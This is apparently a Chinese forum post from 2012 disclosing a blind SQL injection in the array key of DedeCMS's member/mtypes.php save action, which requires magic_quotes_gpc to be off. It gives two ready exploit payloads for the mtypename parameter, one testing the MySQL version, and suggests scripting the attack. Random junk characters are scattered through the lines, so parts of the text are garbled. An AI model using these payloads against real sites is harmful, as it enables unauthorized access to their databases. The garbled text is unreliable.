需要magic_quotes_gpc = Off,所以说是鸡肋啊.
E9 z& v0 M+ @' c0 V5 G- `' F4 b
( X, H, K Y( m: [7 s* }1 e6 O发生在数组key里的注射漏洞,有点意思.
8 g- p* L5 D5 {$ M2 u
& S' r& ~& P, L6 t" Y2 d这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下5 j) S r( a3 d. i( x' h
$ J; D/ Y7 N/ Y. c8 _5 G
http://www.xxx.com /dede/member/mtypes.php?dopost=save8 V# I! i5 T. F) k) ^8 V- S+ _
9 I6 b: ]- X* p |* yexploit:
: F/ ]1 o+ V# Q( ymtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
9 U! O$ Q/ D3 a, |4 w# {mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r2 u; D, m$ f, J5 n1 B
|
发表于 2012-12-20 08:08:09
收藏
支持
反对